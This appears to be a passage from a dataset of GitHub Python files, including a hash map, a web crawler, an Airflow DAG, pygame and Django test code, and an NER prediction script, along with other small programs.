\nrun()\n","repo_name":"4m1g0/PyQt_Demo","sub_path":"example2_buttom.py","file_name":"example2_buttom.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"39552024009","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport PIL.Image as Image\n\nimage = Image.open('img4.jpg')\nimage = np.array(image.getdata())\n\n# make the data\nx = image[0:2000:2]\ny = image[1:2000:2]\n\n# plot\nfig, ax = plt.subplots()\n\nplt.ylabel(f'Нечетные пиксели')\nplt.xlabel(f'Четные пиксели\\n(pixels.py)')\nax.scatter(x, y, s=3)\n\nplt.show()\n","repo_name":"sh1rokovs/Diploms_programms_and_components","sub_path":"Bachelor/new_diplom_files/pixels.py","file_name":"pixels.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18805797131","text":"from project import Truss, Brace, Node\r\nn1 = Node(\"a\",0,1)\r\nn2 = Node(\"b\",1,1)\r\nn3 = Node(\"c\",0,0)\r\nn4 = Node(\"d\",2,0)\r\nb1 = Brace(\"beam 1\",n1,n2)\r\nb2 = Brace(\"beam 2\",n3,n2)\r\nb3 = Brace(\"beam 3\",n3,n4)\r\nb4 = Brace(\"beam 4\",n2,n4)\r\nt = Truss([n1,n2,n3,n4])\r\nanswer = t.calculate(upward_force = 1000)\r\nfor entry in answer:\r\n print(entry + \" \" + str(answer[entry]))\r\n","repo_name":"tyfeeney/truss-structures-numpy","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23726433900","text":"def to_binary(num):\n result = []\n while num >= 1:\n yushu = num%2\n result.append(yushu)\n num = num//2\n return ''.join([str(i) for i in result[::-1]])\n\nif __name__ == '__main__':\n print(to_binary(4))\n","repo_name":"wuyuzhou12345/language_points","sub_path":"面试题目/binary_system.py","file_name":"binary_system.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"4416381812","text":"# coding: utf-8\n\"\"\"\nLinearProbingHashMap uses Linear Probing (one of Open Addressing methods) as collision resolution strategy.\n\nhttps://en.wikipedia.org/wiki/Linear_probing\n\"\"\"\nfrom data_structures.hash_maps.base_map import BaseHashMap\n\n\nclass LinearProbingHashMap(BaseHashMap):\n AVAILABLE_MARKER = object()\n\n # O(n)\n def __iter__(self):\n for item in self._bucket_array:\n if not self._is_empty_or_available(item):\n yield item.key\n\n # O(1) + O(fairly small n) for probing if the load factor is below 1\n def _is_empty_or_available(self, item):\n return (item is None) or (item is self.AVAILABLE_MARKER)\n\n # O(1) + O(fairly small n) for probing if the load factor is below 1\n # O(n) if it triggers resizing\n def __setitem__(self, key, value):\n index = self._hash_func(key)\n while True:\n item = self._bucket_array[index]\n if self._is_empty_or_available(item):\n # Both empty or available bucket can be inserted.\n self._bucket_array[index] = self.ITEM_CLASS(key, value)\n self._size += 1\n self._auto_resize()\n return\n else:\n if item.key == key:\n item.value = value\n return\n else:\n # item.key != key means A[i] is already occupied by another key,\n # So we try to insert the item at A[(i + 1) mod N], A[(i + 2) mod N], and so on.\n pass\n\n index = (index + 1) % len(self._bucket_array)\n\n # O(1) + O(fairly small n) for probing if the load factor is below 1\n def __getitem__(self, key):\n \"\"\"\n We can only stop searching consecutive slots for key when we encounter an \"empty\" bucket or the item with that key.\n If we encounter available markers, we simply skip them.\n \"\"\"\n index = self._hash_func(key)\n while True:\n item = self._bucket_array[index]\n if self._is_empty_or_available(item):\n if item is None:\n raise KeyError\n else:\n if item.key == key:\n return item.value\n\n index = (index + 1) % len(self._bucket_array)\n\n # O(1) + O(fairly small n) for probing if the load factor is below 1\n def __delitem__(self, key):\n index = self._hash_func(key)\n while True:\n item = self._bucket_array[index]\n if self._is_empty_or_available(item):\n if item is None:\n raise KeyError\n else:\n if item.key == key:\n self._bucket_array[index] = self.AVAILABLE_MARKER\n self._size -= 1\n return\n\n index = (index + 1) % len(self._bucket_array)\n","repo_name":"vinta/fuck-coding-interviews","sub_path":"data_structures/hash_maps/linear_probing_hash_map.py","file_name":"linear_probing_hash_map.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","stars":652,"dataset":"github-code","pt":"66"} +{"seq_id":"14285133773","text":"#!/usr/bin/env python\n\nimport toolforge\nimport pickle\nimport argparse\n\nfrom datetime import datetime\n\nparser = argparse.ArgumentParser(description=\"Dump orphaned talk pages to a pickle file\")\nparser.add_argument(\"wiki\", help=\"Wiki database code\")\nparser.add_argument(\"limit\", help=\"Return at most this many rows\")\nargs = parser.parse_args()\n\nwiki = args.wiki\nlimit = int(args.limit)\n\nconn = toolforge.connect(wiki)\n\ng8 = []\n\nwith conn.cursor() as cur:\n\tnow = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\tprint(\"{} - Running orphaned talk/CSD G8 candidate query on wiki {}\".format(now, wiki))\n\tcur.execute(\"SELECT page_namespace, page_title FROM page talkpage WHERE talkpage.page_title NOT LIKE '%/%' AND talkpage.page_namespace IN (1,5,11,15,101,109,119,829) AND NOT EXISTS ( SELECT 1 FROM page mainpage WHERE mainpage.page_namespace=talkpage.page_namespace-1 AND mainpage.page_title=talkpage.page_title ) AND NOT EXISTS ( SELECT 1 FROM templatelinks WHERE talkpage.page_id=tl_from AND tl_title='G8-exempt' ) LIMIT 1000\".format(limit))\n\tg8 = [(ns, e.decode(\"utf-8\")) for ns, e in list(cur.fetchall())]\n\npickle.dump(g8, open(\"/data/project/fireflytools/www/python/src/data/g8_candidates_{}.dat\".format(wiki), \"wb\"))\n","repo_name":"rwjuk/fireflytools","sub_path":"g8_candidates.py","file_name":"g8_candidates.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4948057552","text":"\"\"\"\n関数\n- input_from_stdin()\n- input_from_file(path)\n\"\"\"\n\nimport segments as sg\n# segmentsモジュールをsegとして使える\nimport path\n# 標準ライブラリpathをインポート\n\n\ndef input_from_stdin():\n # 修正したinput_infoを移行する\n points = []\n # pointsをリスト型で定義。\n segments = []\n # segmentsをリスト型で定義。\n tmp = input(\"\") # \"4 2 0 0\"\n tmp = tmp.split(\" \") # [\"4\", \"2\", \"0\", \"0\"]\n # tmpに文字型の数字を格納。\n for i in range(len(tmp)):\n # iをtmpの大きさ分ループさせる\n tmp[i] = int(tmp[i])\n # [4, 2, 0, 0]\n N, M, P, Q = tmp\n # N = tmp[0] , M = tmp[1] , P = tmp[2] , Q = tmp[3]\n for i in range(N): # for N回まわしてなかでinput\n tmp = input(\"\")\n tmp = tmp.split(\" \") # \"0 0\" -> [\"0\", \"0\"]\n tmp[0] = int(tmp[0])\n # 数値型で格納。\n tmp[1] = int(tmp[1])\n # point([0, 0])\n points.append(sg.point(tmp)) # points.append(point(koshikawa))\n\n for i in range(M): # for m\n tmp = input()\n tmp = tmp.split(\" \")\n # \"0 0\" -> koshikawa = [0, 0]\n tmp[0] = int(tmp[0])\n # 数値型で格納。\n tmp[1] = int(tmp[1])\n segments.append(\n sg.segment([points[tmp[0]-1], points[tmp[1]-1]]))\n # segments.append(segment(koshikawa))\n\n \"\"\"\n roots [\n [\"1\", \"4\", 1],\n [\"C1\", \"3\", 1]\n ]\n \"\"\"\n\n roots = []\n # root情報\n\n add_points = []\n # 追加で入力した座標の値\n for i in range(P):\n tmp = input(\"\")\n tmp = tmp.split(\" \")\n tmp[0] = int(tmp[0])\n tmp[1] = int(tmp[1])\n add_points.append(sg.point(tmp))\n\n for i in range(Q):\n tmp = input(\"\")\n tmp = tmp.split(\" \")\n tmp[2] = int(tmp[2])\n # tmp = [\"1\", \"4\", 1]\n roots.append(tmp)\n\n for i in range(Q):\n tmp = input(\"\")\n tmp = tmp.split(\" \")\n roots[i] = tmp\n roots[i][2] = int(tmp[i][2])\n\n return N, M, P, Q, points, segments, add_points, roots\n\n\ndef input_from_file(path=path.input_path):\n with open(path, \"r\") as f:\n tmp = f.readlines()\n N, M, P, Q = [int(x) for x in tmp[0].replace(\"\\n\", \"\").split(\" \")]\n points = []\n segments = []\n roots = []\n add_points = []\n\n for i in range(1, N+1): # points\n points.append(\n sg.point([int(x)\n for x in tmp[i].replace(\"\\n\", \"\").split(\" \")])\n )\n for j in range(N+1, N+M+1): # segments\n tmp2 = [int(x) for x in tmp[j].replace(\"\\n\", \"\").split(\" \")]\n segments.append(sg.segment([\n points[tmp2[0]-1],\n points[tmp2[1]-1]\n ]))\n for k in range(N+M+1, N+M+P+1): # add points\n # 詳しい使い方が不明なのでとりあえずpointsに追加だけする\n adds = [int(x) for x in tmp[k].replace(\"\\n\", \"\").split(\" \")]\n add_points.append(sg.point(adds))\n for l in range(N+M+P+1, N+M+P+Q+1): # root\n roots.append([x for x in tmp[l].replace(\"\\n\", \"\").split(\" \")])\n\n return N, M, P, Q, points, segments, add_points, roots\n","repo_name":"ie03-aizu-2019/ie03project-skys","sub_path":"source/Modules/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31881432376","text":"from space import *\nfrom ships import *\nfrom fleet import *\nimport random\n\nclass Ocean: \n def __init__(self):\n self._width = 10\n self._height = 10\n self.ocean = []\n self.open_ocean_positions = []\n self.create_empty_ocean()\n \n def create_empty_ocean(self):\n for column in range(self._width):\n self.ocean.append([])\n for row in range(self._height):\n self.ocean[column].append(Space()) \n position = (row, column)\n self.open_ocean_positions.append(position) \n \n def display_ocean(self):\n for i in range(self.get_width()):\n if i == 0: print(' ', end = \" \")\n print(i, end = \" \")\n print('\\n')\n \n for i in range(self.get_width()):\n print(i, end = \" \")\n for j in range(self.get_height()):\n print(self.get_char_at(i, j), end = \" \")\n print('\\n')\n \n def get_width(self):\n return self._width\n \n def get_height(self):\n return self._height\n \n def is_open_position(self, position):\n return (position in self.open_ocean_positions) \n \n def is_open_sea(self, row, column):\n position = (row, column)\n return self.is_open_position(position)\n \n def set_space_at(self, row, column, space):\n self.ocean[row][column] = space\n \n def get_space_at(self, row, column):\n return self.ocean[row][column]\n \n def get_char_at(self, row, column):\n return self.get_space_at(row, column).get_char_representation()\n \n def get_type_at(self, row, column):\n return self.get_space_at(row, column).get_ship_type()\n \n def get_surrounding_positions(self, position):\n surrounding_positions = set()\n row = position[0]\n column = position[1]\n \n surrounding_positions.add((row-1, column-1))\n surrounding_positions.add((row-1, column))\n surrounding_positions.add((row-1, column+1))\n surrounding_positions.add((row, column-1))\n surrounding_positions.add((row, column))\n surrounding_positions.add((row, column+1))\n surrounding_positions.add((row+1, column-1))\n surrounding_positions.add((row+1, column))\n surrounding_positions.add((row+1, column+1))\n \n return surrounding_positions\n\n def take_shot(self, row, column):\n position = self.get_space_at(row, column)\n\n if position.get_type() == \"Space\":\n position.check_shot(position)\n elif position.get_type() == \"Position\":\n position.get_ship().check_shot(position)\n \n def get_closed_positions(self, row, column, ship, horizontal):\n resulting_closed_positions = set()\n for i in range(ship.get_length()):\n if horizontal:\n position = (row, column+i)\n ship.add_position(row, column+i) \n self.set_space_at(row, column+i, ship.get_position(row, column+i))\n else:\n position = (row+i, column)\n ship.add_position(row+i, column) \n self.set_space_at(row+i, column, ship.get_position(row+i, column))\n resulting_closed_positions.add(position)\n resulting_closed_positions = resulting_closed_positions.union(self.get_surrounding_positions(position))\n return resulting_closed_positions\n \n def remove_closed_positions(self, positions):\n for position in positions:\n if position in self.open_ocean_positions:\n self.open_ocean_positions.remove(position)\n \n def get_open_positions(self, ship=None, horizontal=-1):\n \n if horizontal == -1:\n return self.open_ocean_positions\n \n return_positions = self.open_ocean_positions[:]\n\n if horizontal:\n for position in self.open_ocean_positions:\n if (position[1] + ship.get_length()) > self._width:\n return_positions.remove(position)\n else:\n for i in range(ship.get_length()):\n if ((position[0], position[1]+i) not in self.open_ocean_positions):\n return_positions.remove(position)\n break\n else:\n for position in self.open_ocean_positions:\n if (position[0] + ship.get_length()) > self._height:\n return_positions.remove(position)\n else:\n for i in range(ship.get_length()):\n if ((position[0]+i, position[1]) not in self.open_ocean_positions):\n return_positions.remove(position)\n break\n \n return return_positions\n \n def place_ship_at(self, row, column, ship, horizontal):\n ship.set_horizontal_bool(horizontal)\n ship.set_starting_row(row)\n ship.set_starting_column(column)\n \n resulting_closed_positions = self.get_closed_positions(row, column, ship, horizontal) \n self.remove_closed_positions(list(resulting_closed_positions))\n \n def build_basic_fleet(self, fleet):\n for i in range(fleet.get_capacity()):\n if i < 1:\n ship = Battleship()\n elif i < 3:\n ship = Cruiser()\n elif i < 6:\n ship = Destroyer()\n else:\n ship = Submarine()\n open_positions = self.get_open_positions(ship, horizontal=True)\n row = open_positions[0][0]\n column = open_positions[0][1]\n self.place_ship_at(row, column, ship, horizontal=True)\n fleet.add_ship(ship)\n \n def build_random_fleet(self, fleet):\n orientation_choices = [True, False]\n for i in range(fleet.get_capacity()):\n if i < 1:\n ship = Battleship()\n elif i < 3:\n ship = Cruiser()\n elif i < 6:\n ship = Destroyer()\n else:\n ship = Submarine()\n horizontal = random.choice(orientation_choices)\n open_positions = self.get_open_positions(ship, horizontal)\n open_position = random.choice(open_positions)\n row = open_position[0]\n column = open_position[1]\n self.place_ship_at(row, column, ship, horizontal)\n fleet.add_ship(ship) \n ","repo_name":"andersgoddard/Battleships","sub_path":"ocean.py","file_name":"ocean.py","file_ext":"py","file_size_in_byte":6601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"1039506376","text":"from airflow.decorators import task\nfrom airflow import DAG\nfrom datetime import timedelta, datetime\nfrom src.google_drive_handler import send_csv_from_disk\n\ndefault_args = {\n 'owner': 'kowal',\n 'retry': 3,\n 'retry_delay': timedelta(minutes=2)\n}\n\nwith DAG(\n dag_id='send_csv_to_google_drive',\n default_args=default_args,\n catchup=False,\n start_date=datetime(2023, 4, 4),\n schedule_interval='@daily',\n tags=['google_drive']\n) as dag:\n @task()\n def send_csv(path):\n send_csv_from_disk(path)\n\n\n @task()\n def second_send_csv(path):\n send_csv_from_disk(path)\n\n\n send_csv('csv1/test_file.csv') >> second_send_csv('est2.csv')\n","repo_name":"krkowal/AirflowProject","sub_path":"dags/send_csv_to_google_drive.py","file_name":"send_csv_to_google_drive.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33676221972","text":"# -*- coding: utf-8 -*\nimport base64\n\nimport mock\nfrom nose.tools import (\n assert_raises,\n eq_,\n)\nfrom passport.backend.oauth.admin.admin.utils import (\n AmCredentialsManager,\n DecryptFailedError,\n)\nfrom passport.backend.oauth.core.test.framework import BaseTestCase\n\n\nTEST_SECRET = base64.b64encode(b'b' * 16).decode()\n\n\nclass AmCredentialsManagerTestcase(BaseTestCase):\n def setUp(self):\n super(AmCredentialsManagerTestcase, self).setUp()\n self.manager = AmCredentialsManager(b64_secret=TEST_SECRET)\n self.manager._make_random_text = mock.Mock(side_effect=lambda length: 'c' * length)\n self.cases = (\n ('a' * 32, 'DhuK/DPxVGL8YBY/HgyQ6YPU9ZTErWP+iOGo7hrFj+VgYyew1SoGzd6z/tM+18MW'),\n )\n\n def test_encrypt_ok(self):\n for from_, to_ in self.cases:\n eq_(\n self.manager.encrypt(from_),\n to_,\n )\n\n def test_decrypt_ok(self):\n for from_, to_ in self.cases:\n decrypted, padding = self.manager.decrypt(to_)\n eq_(\n decrypted,\n from_,\n )\n eq_(\n padding,\n 'c' * (15 - len(from_) % 16),\n )\n\n def test_decrypt_error(self):\n for bad_value in (\n 'foo',\n base64.b64encode(b'foo').decode(),\n ):\n with assert_raises(DecryptFailedError):\n self.manager.decrypt(bad_value)\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"passport/tests/test_utils (16).py","file_name":"test_utils (16).py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16346179421","text":"import datetime\n\nfrom models.user import User\nfrom modules.db_session_manage import DBSessionManage\n\n\nclass UserModule(object):\n \"\"\"Class for UserModule\"\"\"\n\n def create(self, params, database):\n \"\"\"\n Create user\n :params dict params: params to create user\n :params str database: Database\n :return User\n \"\"\"\n db_session = DBSessionManage(database).get_db_session()\n try:\n user = User(database)\n user = self.set_user(user, params)\n\n db_session.add(user)\n db_session.commit()\n\n return user\n\n except:\n db_session.rollback()\n db_session.close()\n raise\n\n def update(self, user, params, db_session):\n \"\"\"\n Update user\n :params dict params: params to update user\n :param session db_session: Database session\n \"\"\"\n if not user:\n raise Exception('UserModule: User is required', 400)\n\n try:\n user.fullname = params.get('fullname')\n\n user.updated_at = datetime.now()\n\n db_session.add(user)\n db_session.commit()\n\n except:\n db_session.rollback()\n db_session.close()\n raise\n\n def delete(self, user, db_session):\n \"\"\"\n Delete user\n :params dict user: User to delete\n :param session db_session: Database session\n \"\"\"\n try:\n db_session.delete(user)\n db_session.flush()\n db_session.commit()\n\n except:\n db_session.rollback()\n db_session.close()\n raise\n\n @classmethod\n def search_by_filter_params(cls, params, database):\n \"\"\"\n Search users by filter params\n :param dict params: Request params\n :param str database: Database\n :return dict: Search users response\n \"\"\"\n db_session = DBSessionManage(database).get_db_session()\n\n users, count = User.get_by_filter_params(params, database)\n\n response = cls.get_default_response()\n response['count'] = count\n response['users'] = cls.users_to_dict(users, db_session)\n\n db_session.close()\n\n return response\n\n @classmethod\n def set_user(cls, user, params):\n \"\"\"\n Set fields values of User\n :param user user: User model\n :param dict params: User params\n :param session db_session: Database session\n :return User\n \"\"\"\n setattr(user, 'fullname', params.get('fullname'))\n\n return user\n\n @classmethod\n def users_to_dict(cls, users, db_session):\n \"\"\"\n Return users in dict format\n :param list of user: List with users\n :param session db_session: Database session\n :return list(dict): List with users in dict format\n \"\"\"\n users_dict = []\n for user in users:\n user_dict = {\n 'id': user.id,\n 'created_at': user.created_at,\n 'fullname': user.fullname,\n 'projects_designated': None,\n 'projects_leader': None,\n 'updated_at': user.updated_at\n }\n cls.set_projects_designated(user.id, user_dict, db_session)\n cls.set_projects_leader(user.id, user_dict, db_session)\n\n users_dict.append(user_dict)\n\n return users_dict\n\n @staticmethod\n def get_default_response():\n \"\"\"\n Get users default response\n :return dict: Users default response\n \"\"\"\n return {\n 'count': 0,\n 'users': []\n }\n\n @staticmethod\n def set_projects_designated(user_id, user_dict, db_session):\n \"\"\"\n Set projects in user dict\n :param int user_id: User id\n :param dict user_dict: User dict\n :param session db_session: Database session\n \"\"\"\n projects_id = []\n projects = User.get_designated_by_project_id(user_id, db_session)\n\n if projects:\n for project in projects:\n projects_id.append(project.id)\n\n user_dict['projects_designated'] = projects_id\n\n @staticmethod\n def set_projects_leader(user_id, user_dict, db_session):\n \"\"\"\n Set projects in user dict\n :param int user_id: User id\n :param dict user_dict: User dict\n :param session db_session: Database session\n \"\"\"\n projects_id = []\n projects = User.get_leader_by_project_id(user_id, db_session)\n\n if projects:\n for project in projects:\n projects_id.append(project.id)\n\n user_dict['projects_leader'] = projects_id\n","repo_name":"Dellaquila07/TaskHub-API","sub_path":"modules/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43009176974","text":"# -*- coding: utf-8 -*-\n\"\"\"\nreference: https://stackoverflow.com/questions/1628766/python-package-for-multi-threaded-spider-w-proxy-support\n\"\"\"\n\n\nimport sys\nfrom urllib import urlopen\nfrom BeautifulSoup import BeautifulSoup\nfrom Queue import Queue, Empty\nfrom threading import Thread\n\nvisited = set()\nqueue = Queue()\n\ndef get_parser(host, root, charset):\n\n try:\n while True:\n url = queue.get_nowait()\n try:\n content = urlopen(url).read().decode(charset)\n except UnicodeDecodeError:\n continue\n for link in BeautifulSoup(content).findAll('a'):\n try:\n href = link['href']\n except KeyError:\n continue\n if not href.startswith('http://'):\n href = 'http://%s%s' % (host, href)\n if not href.startswith('http://%s%s' % (host, root)):\n continue\n if href not in visited:\n visited.add(href)\n queue.put(href)\n print(href)\n except Empty:\n pass\n\nif __name__ == '__main__':\n host, root, charset = sys.argv[1:]\n queue.put('http://%s%s' % (host, root))\n workers = []\n for i in range(5):\n worker = Thread(target=get_parser, args=(host, root, charset))\n worker.start()\n workers.append(worker)\n for worker in workers:\n worker.join()\n","repo_name":"sunggeunkim/datastructure","sub_path":"multithread/web_crawler_thread.py","file_name":"web_crawler_thread.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16717872865","text":"# pygame.mask module\n# https://www.pygame.org/docs/ref/mask.html\n#\n# pygame.sprite module\n# https://www.pygame.org/docs/ref/sprite.html\n#\n# How would I make color collision using pygame.mask?\n# https://stackoverflow.com/questions/65981815/how-would-i-make-color-collision-using-pygame-mask/65982315#65982315\n#\n# GitHub - Sprite, Group and Sprite mask - Sprite mask\n# https://github.com/Rabbid76/PyGameExamplesAndAnswers/blob/master/documentation/pygame/pygame_sprite_and_sprite_mask.md\n#\n# https://replit.com/@Rabbid76/PyGame-SpriteMask\n\nimport pygame\n\ndef ColorMask(image, mask_color):\n mask_image = image.convert()\n mask_image.set_colorkey(mask_color)\n mask = pygame.mask.from_surface(mask_image)\n mask.invert()\n return mask\n\npygame.init()\nwindow = pygame.display.set_mode((450, 250))\n\ntest_image = pygame.Surface((200, 200), pygame.SRCALPHA)\npygame.draw.circle(test_image, (255, 0, 0), (70, 70), 70)\npygame.draw.circle(test_image, (0, 255, 0), (130, 70), 70)\npygame.draw.circle(test_image, (0, 0, 255), (70, 130), 70)\npygame.draw.circle(test_image, (255, 255, 255), (130, 130), 70)\n\nmask = ColorMask(test_image, (255, 0, 0))\n\nrun = True\nwhile run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n window.fill(0)\n window.blit(test_image, (25, 25))\n window.blit(mask.to_surface(), (250, 25))\n pygame.display.flip()\n\npygame.quit()\nexit()","repo_name":"Rabbid76/PyGameExamplesAndAnswers","sub_path":"examples/minimal_examples/pygame_minimal_mask_from_color.py","file_name":"pygame_minimal_mask_from_color.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"66"} +{"seq_id":"73707002129","text":"import argparse\nimport json\nimport sys\nfrom pathlib import Path\n\nsys.path.append(\"../\")\n\nfrom tqdm import tqdm\nimport torch\nfrom torch.utils.data import DataLoader, Subset\nfrom torch.nn.utils.rnn import pad_sequence\nfrom transformers import AutoTokenizer, AutoModel\n\nfrom utils.dataset import ShinraData\nfrom utils.util import to_parallel, to_fp16\nfrom attribute_extraction.dataset import NerDataset, ner_collate_fn, create_dataset_for_ner\nfrom attribute_extraction.model import BertForMultilabelNER, create_pooler_matrix\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n\ndef ner_for_shinradata(model, tokenizer, shinra_dataset, device, bsz=8):\n processed_data = shinra_dataset.ner_inputs\n dataset = NerDataset(processed_data, tokenizer)\n total_preds, _ = predict(model, dataset, device, sent_wise=True)\n\n shinra_dataset.add_nes_from_iob(total_preds)\n\n return shinra_dataset\n\n\ndef predict(model, dataset, device, sent_wise=False):\n model.eval()\n dataloader = DataLoader(dataset, batch_size=8, collate_fn=ner_collate_fn)\n\n total_preds = []\n total_trues = []\n with torch.no_grad():\n for step, inputs in enumerate(dataloader):\n input_ids = inputs[\"tokens\"]\n word_idxs = inputs[\"word_idxs\"]\n\n labels = inputs[\"labels\"]\n\n input_ids = pad_sequence([torch.tensor(t) for t in input_ids], padding_value=0, batch_first=True).to(device)\n attention_mask = input_ids > 0\n pooling_matrix = create_pooler_matrix(input_ids, word_idxs, pool_type=\"head\").to(device)\n\n preds = model.predict(\n input_ids=input_ids,\n attention_mask=attention_mask,\n word_idxs=word_idxs,\n pooling_matrix=pooling_matrix\n )\n\n total_preds.append(preds)\n # test dataの場合truesは使わないので適当にpredsを入れる\n total_trues.append(labels if labels[0] is not None else preds)\n\n attr_num = len(total_preds[0])\n total_preds = [[pred for preds in total_preds for pred in preds[attr]] for attr in range(attr_num)]\n total_trues = [[true for trues in total_trues for true in trues[attr]] for attr in range(attr_num)]\n\n if sent_wise:\n total_preds = [[total_preds[attr][idx] for attr in range(attr_num)] for idx in range(len(total_preds[0]))]\n total_trues = [[total_trues[attr][idx] for attr in range(attr_num)] for idx in range(len(total_trues[0]))]\n\n return total_preds, total_trues\n\ndef parse_arg():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--bert_name\", type=str, help=\"Specify BERT name\")\n parser.add_argument(\"--input_path\", type=str, help=\"Specify input path in SHINRA2020\")\n parser.add_argument(\"--model_path\", type=str, help=\"Specify attribute_list path in SHINRA2020\")\n parser.add_argument(\"--output_path\", type=str, help=\"Specify attribute_list path in SHINRA2020\")\n parser.add_argument(\"--bsz\", type=int, help=\"Specify attribute_list path in SHINRA2020\")\n parser.add_argument(\"--parallel\", action=\"store_true\", help=\"Specify attribute_list path in SHINRA2020\")\n parser.add_argument(\"--fp16\", action=\"store_true\", help=\"whether using inbatch negative\")\n parser.add_argument('--fp16_opt_level', type=str, default=\"O1\")\n parser.add_argument(\"--seed\", type=int, help=\"Specify attribute_list path in SHINRA2020\")\n parser.add_argument(\"--note\", type=str, help=\"Specify attribute_list path in SHINRA2020\")\n\n args = parser.parse_args()\n\n return args\n\nif __name__ == \"__main__\":\n args = parse_arg()\n\n bert = AutoModel.from_pretrained(args.bert_name)\n tokenizer = AutoTokenizer.from_pretrained(args.bert_name)\n\n # dataset = [ShinraData(), ....]\n dataset = ShinraData.from_shinra2020_format(Path(args.input_path), get_attributes=True)\n attributes = next(dataset)\n\n model = BertForMultilabelNER(bert, len(attributes)).to(device)\n model.load_state_dict(torch.load(args.model_path))\n\n if args.fp16:\n assert args.fp16_opt_level is not None\n model = to_fp16(model, fp16_opt_level=args.fp16_opt_level)\n\n with open(args.output_path, \"w\") as f:\n step = 0\n for data in tqdm(dataset):\n if data.nes is None:\n continue\n output_dataset = ner_for_shinradata(model, tokenizer, data, device, bsz=args.bsz)\n f.write(\"\\n\".join([json.dumps(n, ensure_ascii=False) for n in output_dataset.nes]))\n step += 1\n if step > 50:\n break\n f.write(\"\\n\")\n","repo_name":"ujiuji1259/shinra-pipeline","sub_path":"src/attribute_extraction/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12229634760","text":"# from unittest import skip\n\nfrom django.urls import resolve, reverse\n\nfrom recipes import views\n\nfrom .test_recipe_base import RecipeTestBase\n\n\nclass RecipeHomeViewTest(RecipeTestBase):\n def test_recipe_home_view_function_is_correct(self):\n view = resolve(reverse('recipes:home'))\n self.assertIs(view.func, views.home)\n\n def test_recipe_home_view_returns_status_code_200_ok(self):\n response = self.client.get(reverse('recipes:home'))\n self.assertEqual(response.status_code, 200)\n\n def test_recipe_home_view_loads_correct_template(self):\n response = self.client.get(reverse('recipes:home'))\n self.assertTemplateUsed(response, 'recipes/pages/home.html')\n\n # @skip('WIP')\n def test_recipe_home_template_shows_no_recipes_found_if_no_recipes(self):\n response = self.client.get(reverse('recipes:home'))\n self.assertIn(\n '

        No recipes found here

        ',\n response.content.decode('utf-8')\n )\n\n # # Fazer o teste falhar para retornar e resolver o mesmo\n # self.fail('Inclementar o fail para fazer dar erro')\n\n def test_recipe_home_template_loads_recipes(self):\n self.make_recipe(author_data={\n 'first_name': 'Luiz'\n })\n response = self.client.get(reverse('recipes:home'))\n content = response.content.decode('utf-8')\n reponse_context_recipes = response.context['recipes']\n\n self.assertIn('Recipe title', content)\n self.assertIn('10 Minutos', content)\n self.assertIn('5 Porções', content)\n self.assertIn('Luiz', content)\n self.assertEqual(len(reponse_context_recipes), 1)\n\n def test_recipe_home_template_dont_load_recipes_not_published(self):\n self.make_recipe(is_published=False)\n\n response = self.client.get(reverse('recipes:home'))\n\n self.assertIn(\n '

        No recipes found here

        ',\n response.content.decode('utf-8')\n )\n","repo_name":"Richardy-Gabriel/django-recipes-project1","sub_path":"recipes/tests/test_recipe_home_view.py","file_name":"test_recipe_home_view.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1896177225","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 16 22:31:28 2019\r\n\r\n@author: SHF_W\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport rules\r\nimport time\r\n\r\n\r\ndef initialize(): \r\n global startTime\r\n startTime = time.time() \r\n \r\n #SetBehaviorClient(behav_,\"robot_0\")\r\n\r\ndef now_time(start): \r\n return time.time() - start\r\n\r\nattack_hold_value = 31\r\nattack_hold_degre = 10 # 초당 value 10씩 감소, 최대 3번, 한 자리에서 계속 공격하지 않게 하는 값. value가 \r\noccupy_hold_value = 200\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n \r\n team1 = 'blue'\r\n team2 = 'red'\r\n robot1 = rules.rules([200,320], team1)\r\n robot3 = rules.rules([200,320], team2)\r\n \r\n '''\r\n ==================================================\r\n 